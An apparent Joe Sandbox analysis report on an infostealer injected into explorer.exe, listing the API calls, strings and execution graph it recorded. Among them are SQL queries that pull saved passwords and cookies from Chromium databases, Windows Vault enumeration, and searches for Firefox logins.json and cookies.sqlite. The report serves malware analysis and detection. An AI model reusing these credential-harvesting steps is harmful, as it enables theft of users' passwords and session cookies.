  • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
  • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
  • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: fccf324384e8c83a597fe9a4c1c3b15edd22fbc21d66c74b7e4d5d85c879ca18
• Instruction ID: bce1075bd6c2f39f63a36d665dcafc0c7d86377b285ab1b50b00bcc6d13fa5ee
• Opcode Fuzzy Hash: fccf324384e8c83a597fe9a4c1c3b15edd22fbc21d66c74b7e4d5d85c879ca18
• Instruction Fuzzy Hash: 9801DFB2709204EADB009A849E51FBA3325AB40711F304177B603780F1C53C8513BF6F
APIs
• Sleep.KERNELBASE(00001388), ref: 004019CE
  • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
  • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
  • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: eb729094e9229a7d192e463be9b74b04ee994b65f43a785d20844c218813b556
• Instruction ID: c54bd8278c0422601412dfbbaffd59a802a85759ca8d789bb59a0b432e62659e
• Opcode Fuzzy Hash: eb729094e9229a7d192e463be9b74b04ee994b65f43a785d20844c218813b556
• Instruction Fuzzy Hash: EA018B72719245FADB009A859D51FAA3629AB44711F304177B603B80F2D53C8512BE6F
APIs
• Sleep.KERNELBASE(00001388), ref: 004019CE
  • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
  • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
  • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: a0b1578ffed3b6090f3330c07849541098d99241da9b310e6fbab4e92d5445be
• Instruction ID: c4e31ccbe51ade33d5422f141b2801c2a58f39f165a814ade8e731c3b2ff61ab
• Opcode Fuzzy Hash: a0b1578ffed3b6090f3330c07849541098d99241da9b310e6fbab4e92d5445be
• Instruction Fuzzy Hash: 4D016D72719245EADB005A949E51FBA3625AB44711F304177B613780F5C53C8513BF2F
APIs
• Sleep.KERNELBASE(00001388), ref: 004019CE
  • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
  • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
  • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 82c4946c3625fc2f16c037b40791823d007d1c4d34ee98bf3048008ecc9f3771
• Instruction ID: f3fa57dbd4666dd34be6456021c8c5f3785eb3dc384f664cb3cf41b0e000e7fa
• Opcode Fuzzy Hash: 82c4946c3625fc2f16c037b40791823d007d1c4d34ee98bf3048008ecc9f3771
• Instruction Fuzzy Hash: E6F03176319145EADB106A95AD51FB93725AB44321F304177F613780F6C63C8512BF2F
APIs
• Sleep.KERNELBASE(00001388), ref: 004019CE
  • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
  • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
  • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 89346fa385080b9f3f133b0d3ec6a03e7f67549b3ed6c5b23df429eabbd15011
• Instruction ID: 84750dfba710f96cae65e071dcd4f88f4ec9410a91285a7ed0e292360a6f7811
• Opcode Fuzzy Hash: 89346fa385080b9f3f133b0d3ec6a03e7f67549b3ed6c5b23df429eabbd15011
• Instruction Fuzzy Hash: BEF04F72319245FADB015A94AD41BBE3769AB44311F308177B613B80F5C53C8512BF2F
APIs
• Sleep.KERNELBASE(00001388), ref: 004019CE
  • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
  • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
  • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: de8874d48845eae4f1a19f9b5aa7761743db835d0add5313cf27f1d0da932191
• Instruction ID: c9652ae7dc6dae044938ba6b82b21a86f007e17a080de909f10d87e24065c944
• Opcode Fuzzy Hash: de8874d48845eae4f1a19f9b5aa7761743db835d0add5313cf27f1d0da932191
• Instruction Fuzzy Hash: AEF04F72315245FADB106E949D41FAA3725AB44311F308177B613B80F6D53C8512BF2F
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ab996c8f6adeb1f811560704ce36dee006d49d645bc85f4b77d0051227f1598a
• Instruction ID: c79f4b869008ced6ceb997418ae70e62909748bd184317ec6e10328692c13fab
• Opcode Fuzzy Hash: ab996c8f6adeb1f811560704ce36dee006d49d645bc85f4b77d0051227f1598a
• Instruction Fuzzy Hash: 76818B62409381AFC7138F3488955A27FA8AE5332271844FFC4D19B2E3E63D5B06D75A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e0bf8c7eaa3a37be3b3b29c24a77746cc94992b84e6c83370dbbf60a388f8e06
                                                                                                                                      • Instruction ID: 650921735e063de18cdef73246c5fdd7c9a102fb49419af3aad5742e618652a4
                                                                                                                                      • Opcode Fuzzy Hash: e0bf8c7eaa3a37be3b3b29c24a77746cc94992b84e6c83370dbbf60a388f8e06
                                                                                                                                      • Instruction Fuzzy Hash: 72217877A882D28ECF87C97888441C83BC2989F224B4CB1BBC860DB193F325505BC6E1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b3fe677114ba363ad11bc2741d66cbc5f11498b5d6a0ee6581245e02853eaab4
                                                                                                                                      • Instruction ID: 4d10188d7c84e24bf19bc5e9335db40da8dd412138308f7ff1bcf2cb767e1b42
                                                                                                                                      • Opcode Fuzzy Hash: b3fe677114ba363ad11bc2741d66cbc5f11498b5d6a0ee6581245e02853eaab4
                                                                                                                                      • Instruction Fuzzy Hash: 7C118C3698C2D28EDB47CE398C455C47F915C6B62074CA2BEC960CF2D7E228504BC3D1

Execution Graph

Execution Coverage: 3.5%
Dynamic/Decrypted Code Coverage: 47.6%
Signature Coverage: 20%
Total number of Nodes: 699
Total number of Limit Nodes: 81
execution_graph (rendered interactively in the report; the raw node/edge listing is condensed here to the API chains it records, keyed by function address)
• 849304 and 849238: LoadLibraryA, GetProcAddress, VirtualProtect (twice); import resolution and page-protection changes
• 7e2198 (reached from 7e24a4): RtlZeroMemory, GetVersionExW, LoadLibraryW, GetProcAddress (five times), RtlCompareMemory, StrStrIW, FreeLibrary, with helpers 7e1953 (6 API calls) and 7e17c0 (9 API calls)
• 7e2cb5: GetPrivateProfileSectionNamesW, StrStrIW, GetPrivateProfileStringW, GetPrivateProfileIntW, lstrlenW; INI section and value enumeration after 7e1b6a opens and closes the file (CreateFileW, CloseHandle)
• 7e2e30, 7e4317, 7e19e5: registry enumeration with RegOpenKeyExW/RegOpenKeyW, RegEnumKeyExW, RegQueryValueExW, RegCloseKey, filtered with StrStrIW
• 7e1afe: SHGetFolderPathW; 7e1d4a and 7e2b15: directory walks with FindFirstFileW, lstrcmpiW, FindNextFileW, FindClose, StrStrIW (7e2b15) and a CRC32 of names via 7e1cf7 (GetProcessHeap, RtlAllocateHeap, lstrlenW, RtlComputeCrc32)
• 7e3098, 7e3717, 7e3c40: GetTempPathW, GetTempFileNameW, DeleteFileW, CopyFileW, then 834bec (89 API calls) and a loop over 8002ec (94 API calls) and 7e1fa7 (19 API calls); 7e3098 and 7e3717 also call RtlCompareMemory, RtlZeroMemory and CryptUnprotectData; results are formatted with wsprintfA, lstrlen and lstrcat (7e2112 adds GetSystemTimeAsFileTime), passed to 7ffb92 (93 API calls) and 833848 (76 API calls), and the temporary copy is removed with DeleteFileW
• 7e28f8: the same 8002ec/7e1fa7 loop and wsprintfA/lstrcat formatting (with 7e2112) without the temporary copy, ending in 833848 and DeleteFileW
• 7e1198: GetProcessHeap, RtlAllocateHeap, CryptBinaryToStringA (twice); 7e15dd and 7e1333: lstrlen, lstrcat, MultiByteToWideChar, RtlZeroMemory, wsprintfW, VirtualAlloc, RtlMoveMemory
• 7eb1e5 (reached from 7e639e): CreateFileMappingW, MapViewOfFile; 7eb87b: CreateFileW; 7ea40e: ReadFile, memcpy, memset; 7ea67c: SetFilePointer, SetEndOfFile; 7ebafc: GetFileAttributesW, DeleteFileW; 7ebfec: GetSystemInfo
• Memory management: 7e1000 (GetProcessHeap, RtlAllocateHeap), 7e1011 (GetProcessHeap, RtlFreeHeap, VirtualQuery), 7e105d (VirtualFree), 7e9fc8 (HeapCreate), 7e9ea7 (RtlAllocateHeap), 7e9ee8 (RtlFreeHeap); 8355eb: IsProcessorFeaturePresent; 7e99e1: strncmp; 7e56a2, 7eca01, 7ecb2a, 800670 and others: CRT helpers _allmul, _alldiv, _allrem, _alldvrm
• Nodes recorded only by call count (for example 8013ca with 72 to 102 API calls, 822c9e with 105, 819ef6 with 114) were collapsed by the graph and carry no API names

                                                                                                                                      Control-flow Graph: function 007E3717 - 007E3C3D (basic-block graph not reproduced; API nodes on its paths: GetTempPathW, GetTempFileNameW, DeleteFileW, CopyFileW, RtlCompareMemory, RtlZeroMemory, CryptUnprotectData, lstrlen, wsprintfA, lstrcat, DeleteFileW)
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
                                                                                                                                        • Part of subcall function 007E1B6A: CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
                                                                                                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 007E3778
                                                                                                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 007E3782
                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 007E3789
                                                                                                                                      • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 007E3794
                                                                                                                                      • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 007E383B
                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000040), ref: 007E3870
                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?), ref: 007E398B
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 007E399A
                                                                                                                                      • wsprintfA.USER32 ref: 007E39F1
                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 007E39FD
                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 007E3A21
                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E3A49
                                                                                                                                      • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 007E3B13
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 007E3B22
                                                                                                                                      • wsprintfA.USER32 ref: 007E3B79
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 007E3B85
                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 007E3BA9
                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 007E3BDA
                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 007E3C16
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                      • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                                                      • API String ID: 584740257-404540950
                                                                                                                                      • Opcode ID: 753084e603ae571b803a6543b9e1a35dddd2a2558f8ec96fa24b99e8e471b918
                                                                                                                                      • Instruction ID: c19e1182df77cdfa0020508354a497a0b2c3dea1f17149397ddfd1d544c0f087
                                                                                                                                      • Opcode Fuzzy Hash: 753084e603ae571b803a6543b9e1a35dddd2a2558f8ec96fa24b99e8e471b918
                                                                                                                                      • Instruction Fuzzy Hash: 49E19E7060A381AFD715DF26C889A2FBBE9BFC9344F04882CF58597251EB39C945CB52

                                                                                                                                      Control-flow Graph: function 007E2198 - 007E24A3 (basic-block graph not reproduced; API nodes on its paths: RtlZeroMemory, GetVersionExW, LoadLibraryW, GetProcAddress x5, RtlCompareMemory x2, StrStrIW, FreeLibrary)
                                                                                                                                      APIs
                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000114), ref: 007E21AF
                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 007E21BE
                                                                                                                                      • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 007E21E8
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 007E220A
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 007E2214
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 007E2220
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 007E222A
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 007E2236
                                                                                                                                      • RtlCompareMemory.NTDLL(?,00841110,00000010), ref: 007E22E8
                                                                                                                                      • RtlCompareMemory.NTDLL(?,00841110,00000010), ref: 007E236C
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                      • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 007E23FE
                                                                                                                                      • FreeLibrary.KERNELBASE(00000000), ref: 007E2493
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                                                      • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                      • API String ID: 2583887280-2831467701
                                                                                                                                      • Opcode ID: 0292ed1df022c81f5dcd2d52238aa2f4ea3fa1f1cd1eb30cbba1afe2d1eac21b
                                                                                                                                      • Instruction ID: ffcefda6b85ab79197bc31c6ffda1880c97141064d41ee32cee0ab7b78d12066
                                                                                                                                      • Opcode Fuzzy Hash: 0292ed1df022c81f5dcd2d52238aa2f4ea3fa1f1cd1eb30cbba1afe2d1eac21b
                                                                                                                                      • Instruction Fuzzy Hash: 3F91AB71A09381AFC714DF66C855A2FBBE9BFD9704F00882DF58597252EA78DC02CB52

                                                                                                                                      Control-flow Graph: function 007E3098 - 007E33C0 (basic-block graph not reproduced; API nodes on its paths: GetTempPathW, GetTempFileNameW, DeleteFileW, CopyFileW, RtlCompareMemory, RtlZeroMemory, CryptUnprotectData, DeleteFileW)
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
                                                                                                                                        • Part of subcall function 007E1B6A: CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
                                                                                                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 007E30F9
                                                                                                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 007E3103
                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 007E310A
                                                                                                                                      • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 007E3115
                                                                                                                                      • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 007E31A4
                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000040), ref: 007E31D7
                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E32DF
                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 007E339C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                      • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                                      • API String ID: 2757140130-4052020286
                                                                                                                                      • Opcode ID: c077a95fdc3b928c52052dbc3b524e92b69cacb39cf24aee9e36be19e403fc5b
                                                                                                                                      • Instruction ID: d60b5315e16193540f4e0e82634e14d1bc331df4ff5a2368742eed650a574a05
                                                                                                                                      • Opcode Fuzzy Hash: c077a95fdc3b928c52052dbc3b524e92b69cacb39cf24aee9e36be19e403fc5b
                                                                                                                                      • Instruction Fuzzy Hash: F2918A71209381ABD710DF2AC849E2FBBE9BFC9744F04492CF58597291EB39DE448B52

                                                                                                                                      Control-flow Graph: function 007E3ED9 - 007E3FDB (basic-block graph not reproduced; API nodes on its paths: PathCombineW, FindFirstFileW, lstrcmpiW x3, PathCombineW, FindNextFileW, FindClose; the function recurses into itself for subdirectories)
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 007E3F0A
                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 007E3F16
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362CC), ref: 007E3F38
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362D0), ref: 007E3F4C
                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 007E3F69
                                                                                                                                      • lstrcmpiW.KERNEL32(?,Local State), ref: 007E3F7E
                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 007E3F9B
                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 007E3FB5
                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 007E3FC4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                                      • String ID: *.*$Local State
                                                                                                                                      • API String ID: 3923353463-3324723383
                                                                                                                                      • Opcode ID: 9d664275ea743a71660d54507dfab6b53ac096376d7ceec37c1bfb44e3030af5
                                                                                                                                      • Instruction ID: f995dcc161cd655023fbf4e46c67f7efd7837656610af87153d59934936843fd
                                                                                                                                      • Opcode Fuzzy Hash: 9d664275ea743a71660d54507dfab6b53ac096376d7ceec37c1bfb44e3030af5
                                                                                                                                      • Instruction Fuzzy Hash: F721A130601384BBD714B7368C5DA3F77ACEFC9711F444929B822C3191FB7C8A588661

                                                                                                                                      Control-flow Graph: function 007E2B15 - 007E2C74 (basic-block graph not reproduced; API nodes on its paths: FindFirstFileW, lstrcmpiW x2, StrStrIW x2, FindNextFileW, FindClose)
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 007E2B3D
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362CC), ref: 007E2B63
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362D0), ref: 007E2B7B
                                                                                                                                        • Part of subcall function 007E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,007E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 007E19C4
                                                                                                                                      • StrStrIW.SHLWAPI(00000000,logins.json), ref: 007E2BE7
                                                                                                                                      • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 007E2C16
                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 007E2C43
                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 007E2C52
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                                      • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                                      • API String ID: 1108783765-3717368146
